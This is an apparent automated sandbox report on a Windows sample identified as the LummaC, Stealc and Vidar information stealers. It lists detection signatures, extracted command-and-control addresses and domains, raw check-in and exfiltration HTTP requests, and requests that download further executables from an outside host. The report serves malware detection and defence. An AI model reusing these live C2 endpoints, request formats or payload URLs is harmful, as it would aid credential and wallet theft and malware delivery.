Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1558835
MD5: e26ad37f58eaf809521e5050bebf9be4
SHA1: b3468cf198d25f6453d40c65274082eec17a3572
SHA256: e6ad1d53d8a2ecdbf77d597454b0260965b357693c0e525c0ffc81b283f4c7a6
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Downloads executable code via HTTP
Entry point lies outside standard sections
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.206/405117-2476756634-1003bO Avira URL Cloud: Label: malware
Source: http://185.215.113.16/S/-3 Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs/api= Avira URL Cloud: Label: malware
Source: http://185.215.113.16/7J Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs/apiC Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/apiecked Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/; Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exebKit/537.36 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/off/def.exeO Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/ntdesk Avira URL Cloud: Label: malware
Source: http://185.215.113.16/tp Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php?# Avira URL Cloud: Label: malware
Source: http://185.215.113.16/8L$3 Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs/apix Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/apiq Avira URL Cloud: Label: malware
Source: http://185.215.113.16/x4e3 Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs/on Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/D( Avira URL Cloud: Label: malware
Source: http://185.215.113.16/qd#3 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/zwn35 Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs/v1= Avira URL Cloud: Label: malware
Found malware configuration
Source: file.exe.7616.2.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: file.exe.7616.2.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["p3ar11fter.sbs", "peepburry828.sbs", "p10tgrace.sbs", "3xp3cts1aim.sbs", "processhol.sbs"], "Build id": "LOGS11--LiveTraffic"}
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 42%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49832 version: TLS 1.2

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49876 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49725 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49735 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49708 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49725 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49708 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49832 -> 188.114.97.3:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: p3ar11fter.sbs
Source: Malware configuration extractor URLs: peepburry828.sbs
Source: Malware configuration extractor URLs: p10tgrace.sbs
Source: Malware configuration extractor URLs: 3xp3cts1aim.sbs
Source: Malware configuration extractor URLs: processhol.sbs
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 19 Nov 2024 20:02:37 GMTContent-Type: application/octet-streamContent-Length: 1814528Last-Modified: Tue, 19 Nov 2024 19:58:34 GMTConnection: keep-aliveETag: "673cedea-1bb000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 22 01 00 00 00 00 00 00 70 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 c2 de 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6d 73 6f 79 69 77 68 00 20 1a 00 00 40 4f 00 00 12 1a 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 77 79 6d 6c 74 69 79 00 10 00 00 00 60 69 00 00 04 00 00 00 8a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 8e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 39 39 33 45 46 35 32 30 39 33 35 35 37 34 32 31 37 39 36 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="hwid"E993EF520935574217965------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="build"mars------ECGHJJEHDHCAAKFIIDGI--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49750 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49708 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49735 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49725 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49761 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49778 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49802 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49832 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49839 -> 185.215.113.16:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: cook-rain.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CTPDKFGRVFAZ4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12820Host: cook-rain.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7F86KJFW4RGNPFATUKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: cook-rain.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XHOZEPLKFR1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20365Host: cook-rain.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H5ZRJNGOBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1188Host: cook-rain.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=74RWR44EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 583405Host: cook-rain.sbs
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: cook-rain.sbs
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: cook-rain.sbs
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cook-rain.sbs
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/7J
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/8L$3
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/S/-3
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569673630.00000000007D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000002.00000003.1569673630.00000000007D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeO
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/qd#3
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569673630.00000000007D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: file.exe, 00000002.00000002.1632719419.000000000057A000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exebKit/537.36
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/tp
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/x4e3
Source: file.exe, 00000002.00000003.1569706823.0000000000802000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/zwn35
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1632829541.0000000000800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000002.00000002.1632829541.0000000000754000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/405117-2476756634-1003bO
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/C
Source: file.exe, 00000002.00000002.1632829541.0000000000761000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1632829541.0000000000800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:
Source: file.exe, 00000002.00000002.1632829541.0000000000800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?#
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/i
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ntdesk
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.2069
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000002.00000003.1490451305.0000000005480000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569277851.0000000005474000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1569493664.0000000005476000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532217944.0000000005480000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.micy1D
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000002.00000003.1422752155.00000000054B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
